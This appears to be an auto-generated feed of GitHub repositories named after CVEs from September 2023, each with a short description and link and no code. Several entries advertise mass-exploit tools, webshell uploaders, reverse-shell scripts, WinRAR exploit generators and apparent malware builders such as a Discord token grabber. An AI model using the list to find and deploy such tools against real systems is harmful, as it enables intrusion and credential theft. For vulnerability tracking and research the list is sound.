**no description** : [yTxZx/CVE-2022-26134](https://github.com/yTxZx/CVE-2022-26134) create time: 2023-09-27T04:18:55Z

**CVE-2023-34152** : [overgrowncarrot1/ImageTragick_CVE-2023-34152](https://github.com/overgrowncarrot1/ImageTragick_CVE-2023-34152) create time: 2023-09-27T03:37:25Z

**no description** : [PH03N1XSP/CVE-2023-5024](https://github.com/PH03N1XSP/CVE-2023-5024) create time: 2023-09-27T03:28:02Z

**Python script to check if Juniper Firewalls are vulnerable to CVE-2023-36845 - RCE** : [kljunowsky/CVE-2023-36845](https://github.com/kljunowsky/CVE-2023-36845) create time: 2023-09-26T17:56:55Z

**Microsoft SharePoint Server Elevation of Privilege Vulnerability** : [Chocapikk/CVE-2023-29357](https://github.com/Chocapikk/CVE-2023-29357) create time: 2023-09-26T16:18:41Z

**Exploit for CVE-2023-32364** : [gergelykalman/CVE-2023-32364-macos-app-sandbox-escape](https://github.com/gergelykalman/CVE-2023-32364-macos-app-sandbox-escape) create time: 2023-09-26T14:42:00Z

**Repository contains description for CVE-2023-35793** : [Dodge-MPTC/CVE-2023-35793-CSRF-On-Web-SSH](https://github.com/Dodge-MPTC/CVE-2023-35793-CSRF-On-Web-SSH) create time: 2023-09-26T11:39:05Z

**no description** : [Trinadh465/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272](https://github.com/Trinadh465/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272) create time: 2023-09-26T10:28:51Z

**Repository for CVE-2023-43263 vulnerability.** : [b0marek/CVE-2023-43263](https://github.com/b0marek/CVE-2023-43263) create time: 2023-09-26T08:24:16Z

**New exploitation of 2020 Sophos vuln** : [Cyb3rEnthusiast/CVE-2022-1040](https://github.com/Cyb3rEnthusiast/CVE-2022-1040) create time: 2023-09-26T07:26:42Z

**Automatic Mass Tool for check and exploiting vulnerability in CVE-2022-4047 - Return Refund and Exchange For WooCommerce < 4.0.9 - Unauthenticated Arbitrary File Upload** : [im-hanzou/WooRefer](https://github.com/im-hanzou/WooRefer) create time: 2023-09-26T07:23:44Z

**no description** : [nova-master/CVE-2022-21894](https://github.com/nova-master/CVE-2022-21894) create time: 2023-09-26T05:52:36Z

**mooSocial v3.1.8 is vulnerable to external service interaction on post function.** : [ahrixia/CVE-2023-43323](https://github.com/ahrixia/CVE-2023-43323) create time: 2023-09-16T01:28:58Z

**BAD-WEBP-CVE-2023-4863** : [talbeerysec/BAD-WEBP-CVE-2023-4863](https://github.com/talbeerysec/BAD-WEBP-CVE-2023-4863) create time: 2023-09-25T22:10:32Z

**Ivanti Avalanche v6.4.0.0 RCE POC** : [x0rb3l/CVE-2023-32560](https://github.com/x0rb3l/CVE-2023-32560) create time: 2023-08-17T03:39:37Z

**no description** : [bbaranoff/CVE-2023-4863](https://github.com/bbaranoff/CVE-2023-4863) create time: 2023-09-25T10:33:09Z

**Double-Free BUG in WhatsApp exploit poc.** : [tucommenceapousser/CVE-2019-11932deta](https://github.com/tucommenceapousser/CVE-2019-11932deta) create time: 2023-09-25T10:08:15Z

**Double-Free BUG in WhatsApp exploit poc.** : [tucommenceapousser/CVE-2019-11932](https://github.com/tucommenceapousser/CVE-2019-11932) create time: 2023-09-25T07:45:49Z

**no description** : [Any3ite/CVE-2023-2523](https://github.com/Any3ite/CVE-2023-2523) create time: 2023-09-25T08:21:06Z

**VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)** : [Malwareman007/CVE-2023-20887](https://github.com/Malwareman007/CVE-2023-20887) create time: 2023-09-25T00:41:45Z

**Exploit for CVE-2023-29360 targeting MSKSSRV.SYS driver** : [Nero22k/cve-2023-29360](https://github.com/Nero22k/cve-2023-29360) create time: 2023-09-24T21:59:23Z

**CVE-2018-9995 Exploit Tool for Python3** : [Pab450/CVE-2018-9995](https://github.com/Pab450/CVE-2018-9995) create time: 2023-09-24T17:00:37Z

**A Proof of Concept for chaining the CVEs [CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847] to achieve Remote Code Execution (phpinfo) in Juniper JunOS within SRX and EX Series products.Modified from original exploit developed by @watchTowr .** : [r3dcl1ff/CVE-2023-36844_Juniper_RCE](https://github.com/r3dcl1ff/CVE-2023-36844_Juniper_RCE) create time: 2023-09-24T13:30:09Z

**Repository for CVE-2023-4281 vulnerability.** : [b0marek/CVE-2023-4281](https://github.com/b0marek/CVE-2023-4281) create time: 2023-09-24T12:21:19Z

**Repository for CVE-2023-4800 vulnerability.** : [b0marek/CVE-2023-4800](https://github.com/b0marek/CVE-2023-4800) create time: 2023-09-24T12:11:58Z

**Repository for CVE-2023-4549 vulnerability.** : [b0marek/CVE-2023-4549](https://github.com/b0marek/CVE-2023-4549) create time: 2023-09-24T11:57:46Z

**Repository for CVE-2023-4294 vulnerability.** : [b0marek/CVE-2023-4294](https://github.com/b0marek/CVE-2023-4294) create time: 2023-09-24T10:16:03Z

**Repository for CVE-2023-4631 vulnerability.** : [b0marek/CVE-2023-4631](https://github.com/b0marek/CVE-2023-4631) create time: 2023-09-24T08:38:58Z

**Repository for CVE-2023-4279 vulnerability.** : [b0marek/CVE-2023-4279](https://github.com/b0marek/CVE-2023-4279) create time: 2023-09-24T08:26:37Z

**Repository for CVE-2023-0157 vulnerability.** : [b0marek/CVE-2023-0157](https://github.com/b0marek/CVE-2023-0157) create time: 2023-09-24T08:20:30Z

**Repository for CVE-2023-0156 vulnerability.** : [b0marek/CVE-2023-0156](https://github.com/b0marek/CVE-2023-0156) create time: 2023-09-24T08:10:31Z

**Repository for CVE-2023-42426 vulnerability.** : [b0marek/CVE-2023-42426](https://github.com/b0marek/CVE-2023-42426) create time: 2023-09-24T07:34:05Z

**ecology_9_sql** : [chenghao-hao/cve-2023-42413](https://github.com/chenghao-hao/cve-2023-42413) create time: 2023-09-24T06:17:33Z

**Elasticsearch Stack Overflow Vulnerability** : [sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419](https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419) create time: 2023-09-22T02:15:54Z

**Got My CVE Published CVE-2023-41575** : [soundarkutty/Stored-xss](https://github.com/soundarkutty/Stored-xss) create time: 2023-08-26T09:26:35Z

**PoC for the type confusion vulnerability in Mac's CMS that results in authentication bypass and administrator account takeover.** : [ally-petitt/CVE-2023-43154-PoC](https://github.com/ally-petitt/CVE-2023-43154-PoC) create time: 2023-09-09T00:21:58Z

**A PoC exploit for CVE-2022-34753 - OS Command Injection in SpaceLogic C-Bus Home Controller** : [K3ysTr0K3R/CVE-2022-34753-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-34753-EXPLOIT) create time: 2023-09-22T20:41:19Z

**no description** : [DimaMend/cve-2022-42889-text4shell](https://github.com/DimaMend/cve-2022-42889-text4shell) create time: 2023-09-22T17:17:26Z

**mooSocial v3.1.8 is vulnerable to cross-site scripting on admin dashboard login function.** : [ahrixia/CVE-2023-43326](https://github.com/ahrixia/CVE-2023-43326) create time: 2023-09-19T03:38:25Z

**no description** : [apt0factury/CVE-2023-36884](https://github.com/apt0factury/CVE-2023-36884) create time: 2023-09-22T15:04:40Z

**mooSocial v3.1.8 is vulnerable to cross-site scripting on user login function.** : [ahrixia/CVE-2023-43325](https://github.com/ahrixia/CVE-2023-43325) create time: 2023-09-16T01:05:16Z

**CSZ CMS 1.3.0 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Additional Meta Tag parameter in the Pages Content Menu.** : [sromanhu/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content](https://github.com/sromanhu/CVE-2023-41436-CSZ-CMS-Stored-XSS---Pages-Content) create time: 2023-08-23T11:34:30Z

**Explore CVE 2023-30845 de forma automática em vários subdomínos** : [himori123/-CVE-2023-30845](https://github.com/himori123/-CVE-2023-30845) create time: 2023-09-22T01:14:20Z

**CMSmadesimple 2.2.18 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation process.** : [sromanhu/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation) create time: 2023-09-16T13:35:49Z

**批量检测CVE-2023-36846漏洞** : [Dreamy-elfland/CVE-2023-36846](https://github.com/Dreamy-elfland/CVE-2023-36846) create time: 2023-09-21T14:15:50Z

**no description** : [mistymntncop/CVE-2023-4863](https://github.com/mistymntncop/CVE-2023-4863) create time: 2023-09-21T05:22:51Z

**OpenSSH Pre-Auth Double Free CVE-2023-25136 – Writeup and Proof-of-Concept** : [malvika-thakur/CVE-2023-25136](https://github.com/malvika-thakur/CVE-2023-25136) create time: 2023-09-21T12:05:35Z

**Proof-of-Concept (POC) of CVE-2023-38831 Zero-Day vulnerability in WinRAR** : [malvika-thakur/CVE-2023-38831-WinRAR-POC-](https://github.com/malvika-thakur/CVE-2023-38831-WinRAR-POC-) create time: 2023-09-21T06:08:30Z

**no description** : [pazhanivel07/frameworks_av_AOSP_10_r33_CVE-2023-35687_CVE-2023-35679](https://github.com/pazhanivel07/frameworks_av_AOSP_10_r33_CVE-2023-35687_CVE-2023-35679) create time: 2023-09-21T06:07:57Z

**Python implementation of CVE-2023-27163** : [Hamibubu/CVE-2023-27163](https://github.com/Hamibubu/CVE-2023-27163) create time: 2023-09-21T02:43:02Z

**no description** : [MateusTesser/CVE-2023-31719](https://github.com/MateusTesser/CVE-2023-31719) create time: 2023-09-21T00:28:16Z

**no description** : [MateusTesser/CVE-2023-31718](https://github.com/MateusTesser/CVE-2023-31718) create time: 2023-09-21T00:27:10Z

**no description** : [MateusTesser/CVE-2023-31717](https://github.com/MateusTesser/CVE-2023-31717) create time: 2023-09-21T00:25:52Z

**no description** : [MateusTesser/CVE-2023-31716](https://github.com/MateusTesser/CVE-2023-31716) create time: 2023-09-21T00:24:25Z

**Python3 POC for CVE-2021-39165 in CachetHQ** : [manbolq/CVE-2021-39165](https://github.com/manbolq/CVE-2021-39165) create time: 2023-09-20T22:19:55Z

**no description** : [apt0factury/CVE-2023-36761](https://github.com/apt0factury/CVE-2023-36761) create time: 2023-09-20T21:50:45Z

**no description** : [apt0factury/CVE-2023-41064](https://github.com/apt0factury/CVE-2023-41064) create time: 2023-09-20T21:21:41Z

**A PoC for CVE-2022-26134 for Educational Purposes and Security Research** : [acfirthh/CVE-2022-26134](https://github.com/acfirthh/CVE-2022-26134) create time: 2023-09-20T19:54:05Z

**SQL injection vulnerbility in jeecgboot jeecg-boot v. allows a remote attacker to execute arbitrary code via a crafted request to the report/jeecgboot/jmreport/queryFieldBySql component.** : [Zone1-Z/CVE-2023-40989](https://github.com/Zone1-Z/CVE-2023-40989) create time: 2023-09-20T12:43:23Z

**a poc for cve-2023-36109** : [Limesss/CVE-2023-36109](https://github.com/Limesss/CVE-2023-36109) create time: 2023-09-20T06:26:32Z

**no description** : [nidhi7598/linux-4.19.72_CVE-2023-4128](https://github.com/nidhi7598/linux-4.19.72_CVE-2023-4128) create time: 2023-09-20T04:43:28Z

**Perform With Massive Juniper Remote Code Execution** : [Pari-Malam/CVE-2023-36844](https://github.com/Pari-Malam/CVE-2023-36844) create time: 2023-09-20T02:32:56Z

**Mass Exploit - CVE-2023-0255 < WordPress < Enable Media+Plugin < Unauthenticated Arbitrary File Upload / Webshell Upload** : [codeb0ss/CVE-2023-0255-PoC](https://github.com/codeb0ss/CVE-2023-0255-PoC) create time: 2023-09-20T00:17:57Z

**DR. GANDALF: Aplicacion DESKTOP para WINDOWS, Inyector de archivos ZIP, generador de exploits para vulnerabilidad de WinRAR 6.22 y anteriores.** : [elefantesagradodeluzinfinita/cve-2023-38831](https://github.com/elefantesagradodeluzinfinita/cve-2023-38831) create time: 2023-09-19T12:47:12Z

**exp4CVE-2023-36319** : [Lowalu/CVE-2023-36319](https://github.com/Lowalu/CVE-2023-36319) create time: 2023-09-19T08:17:21Z

**no description** : [Trinadh465/linux-4.1.15_CVE-2023-4128](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-4128) create time: 2023-09-19T06:45:47Z

**Automatic Mass Tool for check and exploiting vulnerability in CVE-2023-3076 - MStore API < 3.9.9 - Unauthenticated Privilege Escalation (Mass Add Admin)** : [im-hanzou/MSAPer](https://github.com/im-hanzou/MSAPer) create time: 2023-09-19T04:59:01Z

**no description** : [1Gould/CVE-2020-5844-exploit](https://github.com/1Gould/CVE-2020-5844-exploit) create time: 2023-09-18T21:14:30Z

**A tool to discover Juniper firewalls vulnerable to CVE-2023-36845** : [vulncheck-oss/cve-2023-36845-scanner](https://github.com/vulncheck-oss/cve-2023-36845-scanner) create time: 2023-09-16T09:11:21Z

**simple urls < 115 - Reflected XSS** : [amirzargham/CVE-2023-0099-exploit](https://github.com/amirzargham/CVE-2023-0099-exploit) create time: 2023-09-18T06:44:44Z

**CVE-2020-5847 exploit written in python** : [1Gould/CVE-2020-5847-exploit](https://github.com/1Gould/CVE-2020-5847-exploit) create time: 2023-09-18T02:19:38Z

**GameoverlayFS (CVE-2023-2640 and CVE-2023-32629) exploit in Shell Script tested on Ubuntu 20.04 Kernel 5.4.0** : [luanoliveira350/GameOverlayFS](https://github.com/luanoliveira350/GameOverlayFS) create time: 2023-09-17T23:17:22Z

**no description** : [mrblue12-byte/CVE-2018-15473](https://github.com/mrblue12-byte/CVE-2018-15473) create time: 2023-09-17T22:40:49Z

**CVE: CVE-2022-0847** : [pashayogi/DirtyPipe](https://github.com/pashayogi/DirtyPipe) create time: 2023-09-17T12:43:52Z

**CVE-2022-32947 walkthough and demo** : [asahilina/agx-exploit](https://github.com/asahilina/agx-exploit) create time: 2023-09-17T08:21:47Z

**no description** : [an040702/CVE-2023-38831](https://github.com/an040702/CVE-2023-38831) create time: 2023-09-17T05:21:30Z

**Automatic Mass Tool for check and exploiting vulnerability in CVE-2022-4061 - JobBoardWP < 1.2.2 - Unauthenticated Arbitrary File Upload** : [im-hanzou/JBWPer](https://github.com/im-hanzou/JBWPer) create time: 2023-09-17T03:20:23Z

**no description** : [tucommenceapousser/CVE-2023-27372b](https://github.com/tucommenceapousser/CVE-2023-27372b) create time: 2023-09-16T21:21:12Z

**nginx http request smugling error_page directive** : [0xleft/CVE-2019-20372](https://github.com/0xleft/CVE-2019-20372) create time: 2023-09-16T19:47:18Z

**https://www.exploit-db.com/exploits/50057** : [brunorhis/CVE2009-2265](https://github.com/brunorhis/CVE2009-2265) create time: 2023-09-16T16:45:56Z

**Nostromo 1.9.6 reverse shell** : [0xTabun/CVE-2019-16278](https://github.com/0xTabun/CVE-2019-16278) create time: 2023-09-16T17:01:25Z

**no description** : [futurezayka/CVE-2011-3192](https://github.com/futurezayka/CVE-2011-3192) create time: 2023-09-16T14:01:39Z

**no description** : [gleaming0/CVE-2019-13288](https://github.com/gleaming0/CVE-2019-13288) create time: 2023-09-16T10:45:12Z

**Automatic Mass Tool for checking vulnerability in CVE-2022-4060 - WordPress Plugin : User Post Gallery <= 2.19 - Unauthenticated RCE** : [im-hanzou/UPGer](https://github.com/im-hanzou/UPGer) create time: 2023-09-15T21:38:47Z

**Rejetto http File Server 2.3.x (Reverse shell)** : [0xTabun/CVE-2014-6287](https://github.com/0xTabun/CVE-2014-6287) create time: 2023-09-15T21:13:25Z

**no description** : [Trinadh465/linux-4.1.15_CVE-2023-4128](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-4128) create time: 2023-09-15T13:45:01Z

**no description** : [IMHarman/CVE-2022-33891](https://github.com/IMHarman/CVE-2022-33891) create time: 2023-09-15T12:49:58Z

**no description** : [IMHarman/CVE-2023-38831](https://github.com/IMHarman/CVE-2023-38831) create time: 2023-09-15T12:58:55Z

**no description** : [nidhi7598/external_tcpdump-4.9.2_AOSP_10_r33_CVE-2018-14882](https://github.com/nidhi7598/external_tcpdump-4.9.2_AOSP_10_r33_CVE-2018-14882) create time: 2023-09-15T09:29:30Z

**Django JSONField/HStoreField SQL Injection Vulnerability (CVE-2019-14234)** : [malvika-thakur/CVE-2019-14234](https://github.com/malvika-thakur/CVE-2019-14234) create time: 2023-09-15T09:34:56Z

**no description** : [nidhi7598/linux-v4.19.72_CVE-2022-3564](https://github.com/nidhi7598/linux-v4.19.72_CVE-2022-3564) create time: 2023-09-15T10:04:05Z

**no description** : [nidhi7598/linux-4.19.72_CVE-2022-3564](https://github.com/nidhi7598/linux-4.19.72_CVE-2022-3564) create time: 2023-09-15T07:18:19Z

**no description** : [nidhi7598/linux-4.19.72_CVE-2022-3564](https://github.com/nidhi7598/linux-4.19.72_CVE-2022-3564) create time: 2023-09-15T06:54:46Z

**no description** : [Trinadh465/linux-4.1.15_CVE-2023-26607](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-26607) create time: 2023-09-15T06:42:36Z

**no description** : [Anthony1500/CVE-2022-40684](https://github.com/Anthony1500/CVE-2022-40684) create time: 2023-09-14T21:29:03Z

**Samba Reverse Shell** : [0xTabun/CVE-2007-2447](https://github.com/0xTabun/CVE-2007-2447) create time: 2023-09-14T14:35:33Z

**Shellshock vulnerability reverse shell** : [0xTabun/CVE-2014-6271](https://github.com/0xTabun/CVE-2014-6271) create time: 2023-09-14T10:45:53Z

**no description** : [Trinadh465/linux-4.1.15_CVE-2022-3564](https://github.com/Trinadh465/linux-4.1.15_CVE-2022-3564) create time: 2023-09-14T09:07:11Z

**CVE-2023-4863 POC** : [suhipek/CVE-2023-4863](https://github.com/suhipek/CVE-2023-4863) create time: 2023-09-14T02:12:41Z

**CVE-2018-1000861 Exploit** : [smokeintheshell/CVE-2018-1000861](https://github.com/smokeintheshell/CVE-2018-1000861) create time: 2023-09-13T18:52:33Z

**no description** : [rohitc33/CVE-2022-32862](https://github.com/rohitc33/CVE-2022-32862) create time: 2023-09-13T18:29:27Z

**no description** : [Trinadh465/external_tcpdump_CVE-2018-14880](https://github.com/Trinadh465/external_tcpdump_CVE-2018-14880) create time: 2023-09-13T14:31:22Z

**no description** : [Trinadh465/external_tcpdump_CVE-2018-14469](https://github.com/Trinadh465/external_tcpdump_CVE-2018-14469) create time: 2023-09-13T13:13:26Z

**no description** : [nidhi7598/external_tcpdump-4.9.2_AOSP_10_r33_CVE-2018-14468](https://github.com/nidhi7598/external_tcpdump-4.9.2_AOSP_10_r33_CVE-2018-14468) create time: 2023-09-13T11:50:03Z

**This is a Proof of Concept (PoC) for CVE-2023-3244, a vulnerability in comment-like-dislike. The PoC demonstrates the exploitability of this vulnerability and serves as a reference for security researchers and developers to better understand and mitigate the risk associated with this issue.** : [drnull03/POC-CVE-2023-3244](https://github.com/drnull03/POC-CVE-2023-3244) create time: 2023-09-13T11:52:36Z

**no description** : [Mr-n0b3dy/CVE-2023-42362](https://github.com/Mr-n0b3dy/CVE-2023-42362) create time: 2023-09-12T10:46:12Z

**no description** : [Trinadh465/external_tcpdump_CVE-2018-14879](https://github.com/Trinadh465/external_tcpdump_CVE-2018-14879) create time: 2023-09-13T10:47:06Z

**no description** : [nidhi7598/external_tcpdump-4.9.2_AOSP_10_r33_CVE-2018-16229](https://github.com/nidhi7598/external_tcpdump-4.9.2_AOSP_10_r33_CVE-2018-16229) create time: 2023-09-13T09:08:45Z

**no description** : [nidhi7598/external_tcpdump-4.9.2_AOSP_10_r33_CVE-2018-14465](https://github.com/nidhi7598/external_tcpdump-4.9.2_AOSP_10_r33_CVE-2018-14465) create time: 2023-09-13T06:41:20Z

**no description** : [amirzargham/CVE-2023-08-21-exploit](https://github.com/amirzargham/CVE-2023-08-21-exploit) create time: 2023-09-13T05:59:02Z

**Proof-of-Concept for CVE-2023-38146 ("ThemeBleed")** : [gabe-k/themebleed](https://github.com/gabe-k/themebleed) create time: 2023-09-13T04:00:14Z

**CVE-2023-38831 zero-Day vulnerability in WinRAR exploited by cybercriminals to target traders** : [Rezaguii/winrar-exploit-CVE-2023-38831-tool](https://github.com/Rezaguii/winrar-exploit-CVE-2023-38831-tool) create time: 2023-09-13T01:18:30Z

**Authenticated SQL Injection Vulnerability in VTiger Open Source CRM v7.5** : [jselliott/CVE-2023-38891](https://github.com/jselliott/CVE-2023-38891) create time: 2023-09-12T22:58:41Z

**no description** : [ov3rwatch/Detection-and-Mitigation-for-CVE-2022-1679](https://github.com/ov3rwatch/Detection-and-Mitigation-for-CVE-2022-1679) create time: 2023-09-12T17:47:01Z

**Proof of concept (PoC) exploit for WinRAR vulnerability (CVE-2023-38831) vulnerability** : [ameerpornillos/CVE-2023-38831-WinRAR-Exploit](https://github.com/ameerpornillos/CVE-2023-38831-WinRAR-Exploit) create time: 2023-09-12T16:01:17Z

**CVE-2023-38831 WinRaR Exploit Generator** : [Malwareman007/CVE-2023-38831](https://github.com/Malwareman007/CVE-2023-38831) create time: 2023-09-12T14:07:00Z

**CVE-2020-1938(GhostCat) clean and readable code version** : [w4fz5uck5/CVE-2020-1938-Clean-Version](https://github.com/w4fz5uck5/CVE-2020-1938-Clean-Version) create time: 2020-03-01T01:45:23Z

**no description** : [themmokhtar/CVE-2020-0022](https://github.com/themmokhtar/CVE-2020-0022) create time: 2023-08-28T09:20:38Z

**Android App Pin Security Issue Allowing Unauthorized Payments via Google Wallet** : [MrTiz/CVE-2023-35671](https://github.com/MrTiz/CVE-2023-35671) create time: 2023-09-01T20:16:28Z

**no description** : [nidhi7598/guava-v18.0_CVE-2020-8908](https://github.com/nidhi7598/guava-v18.0_CVE-2020-8908) create time: 2023-09-12T06:03:20Z

**no description** : [nidhi7598/OPENSSL_1.1.1g_CVE-2022-0778](https://github.com/nidhi7598/OPENSSL_1.1.1g_CVE-2022-0778) create time: 2023-09-12T05:16:27Z

**Mass Exploit - CVE-2023-1273 / ND Shortcodes < LFI** : [codeb0ss/CVE-2023-1273-PoC](https://github.com/codeb0ss/CVE-2023-1273-PoC) create time: 2023-09-12T00:10:58Z

**Mass Exploit - CVE-2023-4238 / Wordpress Prevent files/Access Plugin Upload_Webshell.php** : [codeb0ss/CVE-2023-4238-PoC](https://github.com/codeb0ss/CVE-2023-4238-PoC) create time: 2023-09-11T23:53:11Z

**CVE-2023-42469** : [actuator/com.full.dialer.top.secure.encrypted](https://github.com/actuator/com.full.dialer.top.secure.encrypted) create time: 2023-09-02T17:11:58Z

**Automatic Mass Tool for checking vulnerability in CVE-2022-4063 - InPost Gallery < 2.1.4.1 - Unauthenticated LFI to RCE** : [im-hanzou/INPGer](https://github.com/im-hanzou/INPGer) create time: 2023-09-11T20:01:04Z

**no description** : [Cr4ckC4t/CVE-2018-6574](https://github.com/Cr4ckC4t/CVE-2018-6574) create time: 2023-09-11T19:11:36Z

**creating an hack for that cve as a research and attack** : [0nyx-hkr/cve-2023-4350](https://github.com/0nyx-hkr/cve-2023-4350) create time: 2023-09-11T14:09:48Z

**MapPress Maps Pro < 2.53.9 - Remote Code Execution (RCE) due to Incorrect Access Control in AJAX Actions** : [RandomRobbieBF/CVE-2020-12077](https://github.com/RandomRobbieBF/CVE-2020-12077) create time: 2023-09-11T12:43:47Z

**Automatic Mass Tool for checking vulnerability in CVE-2023-0159 - Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated LFI** : [im-hanzou/EVCer](https://github.com/im-hanzou/EVCer) create time: 2023-09-11T11:36:35Z

**no description** : [nidhi7598/OPENSSL_1.1.1g_CVE-2021-4160](https://github.com/nidhi7598/OPENSSL_1.1.1g_CVE-2021-4160) create time: 2023-09-11T10:42:41Z

**no description** : [SorceryIE/CVE-2023-41362_MyBB_ACP_RCE](https://github.com/SorceryIE/CVE-2023-41362_MyBB_ACP_RCE) create time: 2023-09-11T07:49:38Z

**Development of an exploit for privilege escalation in Windows systems ( NT / 2k / XP / 2K3 / VISTA / 2k8 / 7 ) using the vulnerability CVE-2010-0232** : [azorfus/CVE-2010-0232](https://github.com/azorfus/CVE-2010-0232) create time: 2023-09-11T10:08:21Z

**no description** : [Trinadh465/openssl-1.1.1g_CVE-2021-23840](https://github.com/Trinadh465/openssl-1.1.1g_CVE-2021-23840) create time: 2023-09-11T09:24:54Z

**no description** : [3lp4tr0n/CVE-2023-27470_Exercise](https://github.com/3lp4tr0n/CVE-2023-27470_Exercise) create time: 2023-09-11T08:04:08Z

**no description** : [nidhi7598/OPENSSL_1.1.1g_CVE-2021-3712](https://github.com/nidhi7598/OPENSSL_1.1.1g_CVE-2021-3712) create time: 2023-09-11T07:43:19Z

**no description** : [Trinadh465/openssl-1.1.1g_CVE-2022-0778](https://github.com/Trinadh465/openssl-1.1.1g_CVE-2022-0778) create time: 2023-09-11T07:30:33Z

**ช่องโหว่ CVE-2023-35674 *สถานะ: ยังไม่เสร็จ*** : [Thampakon/CVE-2023-35674](https://github.com/Thampakon/CVE-2023-35674) create time: 2023-09-11T05:34:43Z

**A Proof of Concept for the CVE-2021-46398 flaw exploitation** : [LalieA/CVE-2021-46398](https://github.com/LalieA/CVE-2021-46398) create time: 2023-01-03T09:49:22Z

**no description** : [davidholiday/CVE-2007-4559](https://github.com/davidholiday/CVE-2007-4559) create time: 2023-09-10T21:49:32Z

**An advanced RCE tool tailored for exploiting a vulnerability in Cacti v1.2.22. Crafted with precision, this utility aids security researchers in analyzing and understanding the depth of the CVE-2022-46169 flaw. Use responsibly and ethically.** : [copyleftdev/PricklyPwn](https://github.com/copyleftdev/PricklyPwn) create time: 2023-09-10T17:00:50Z

**no description** : [caopengyan/CVE-2023-2825](https://github.com/caopengyan/CVE-2023-2825) create time: 2023-09-10T14:51:30Z

**no description** : [WinDyAlphA/CVE-2015-9235_JWT_key_confusion](https://github.com/WinDyAlphA/CVE-2015-9235_JWT_key_confusion) create time: 2023-09-10T11:27:23Z

**no description** : [caopengyan/CVE-2023-3450](https://github.com/caopengyan/CVE-2023-3450) create time: 2023-09-10T12:09:05Z

**Vulnerability Disclosure Timeline Closer inspection of the Exploit JPG content reveals the malicious link as well as the URL Download and Execute of the tool used to generate the Exploit JPG from Python encrypted code content which we also implement in couple of our builders.** : [bestjectr/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2023](https://github.com/bestjectr/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2023) create time: 2023-09-10T09:36:50Z

**Get system info (Version, CPU, GPU, RAM, IPs, BSSID, Location, Screen metrics, Installed apps)** : [bestjectr/Discord-Image-Token-Password-Grabber-Exploit-Cve-2023](https://github.com/bestjectr/Discord-Image-Token-Password-Grabber-Exploit-Cve-2023) create time: 2023-09-10T09:36:13Z

**CVE-2023-20052 information leak vulnerability in the DMG file parser of ClamAV** : [cY83rR0H1t/CVE-2023-20052](https://github.com/cY83rR0H1t/CVE-2023-20052) create time: 2023-07-19T07:39:20Z

**no description** : [leekenghwa/CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below) create time: 2023-07-24T03:11:05Z

**no description** : [leekenghwa/CVE-2023-37755---Hardcoded-Admin-Credential-in-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37755---Hardcoded-Admin-Credential-in-i-doit-Pro-25-and-below) create time: 2023-07-24T02:42:27Z

**no description** : [0xZon/CVE-2022-46169-Exploit](https://github.com/0xZon/CVE-2022-46169-Exploit) create time: 2023-09-10T06:03:22Z

**no description** : [leekenghwa/CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below) create time: 2023-07-24T01:57:31Z

**Mass Exploit - CVE-2023-1698 < Unauthenticated Remote Command Execution** : [codeb0ss/CVE-2023-1698-PoC](https://github.com/codeb0ss/CVE-2023-1698-PoC) create time: 2023-09-10T01:29:48Z

**TP-Link Archer AX21 - Unauthenticated Command Injection [Loader]** : [Terminal1337/CVE-2023-1389](https://github.com/Terminal1337/CVE-2023-1389) create time: 2023-09-09T15:53:22Z

**simulation experiment of Curveball (CVE-2020-0601) attacks under ECQV implicit certificates with Windows-like verifiers** : [tyj956413282/curveball-plus](https://github.com/tyj956413282/curveball-plus) create time: 2023-09-09T11:38:11Z

**Proof of Concept for RCE vuln in Apache Commons Text** : [0xxis/CVE-2022-42889](https://github.com/0xxis/CVE-2022-42889) create time: 2023-09-09T12:11:36Z

**ช่องโหว่ CVE-2019-8331** : [Thampakon/CVE-2019-8331](https://github.com/Thampakon/CVE-2019-8331) create time: 2023-09-09T04:03:06Z

**SolarView vuln** : [Yobing1/CVE-2023-40924](https://github.com/Yobing1/CVE-2023-40924) create time: 2023-08-15T15:44:58Z

**A PoC exploit for CVE-2017-8225 - GoAhead System.ini Leak** : [K3ysTr0K3R/CVE-2017-8225-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2017-8225-EXPLOIT) create time: 2023-09-08T21:47:18Z

**no description** : [Hikikan/CVE-2021-22205](https://github.com/Hikikan/CVE-2021-22205) create time: 2023-09-08T21:16:40Z

**no description** : [nidhi7598/OPENSSL_1.1.1g_CVE-2021-3449](https://github.com/nidhi7598/OPENSSL_1.1.1g_CVE-2021-3449) create time: 2023-09-08T10:53:39Z

**no description** : [nidhi7598/OPENSSL_1.1.1g_CVE-2021-23841](https://github.com/nidhi7598/OPENSSL_1.1.1g_CVE-2021-23841) create time: 2023-09-08T09:32:30Z

**Cisco AnyConnect Posture (HostScan) Local Privilege Escalation: CVE-2021-1366** : [koztkozt/CVE-2021-1366](https://github.com/koztkozt/CVE-2021-1366) create time: 2023-09-08T09:20:20Z

